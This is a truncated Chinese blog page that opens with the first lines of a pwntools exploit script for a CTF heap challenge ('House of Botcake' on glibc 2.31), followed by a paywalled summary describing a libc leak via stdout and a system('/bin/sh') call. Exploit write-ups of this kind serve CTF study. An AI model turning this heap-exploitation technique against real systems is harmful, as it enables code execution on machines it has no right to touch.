from pwn import *
context.update(os='linux',arch='amd64',log_level='debug')
#c=remote(b'node4.buuoj.cn',25937)
# c=process(b'./pwn1')
libc=ELF(b'/pwn/libc')
#def dbg():
# gdb.attach(c,'''
# b *$rebase(0x14a1)
# b *$rebase(0x14f9)
# b *$rebase(0x15d7)
# b *$rebase(0x1684)
#
#
# ''')
def dbg():
gdb.attach(c)
pause()
def add(size,content):
c.sendlineafter(b'choice : ',b'1')
c.sendafter(b'Size: ',str(size))
c.sendafter(b'Content: ',content)
def</
house of botcake利用模板+爆破stdout泄露地址 glibc2.31
于 2022-11-06 19:45:00 首次发布
本文详细解析了一道名为House of Botcake的PWN题目,通过构造特定的数据结构漏洞来实现任意代码执行。文章展示了如何利用gdb进行调试,并通过精心构造payload来泄露libc基地址,最终调用system函数执行/bin/sh命令。

最低0.47元/天 解锁文章
825

被折叠的 条评论
为什么被折叠?



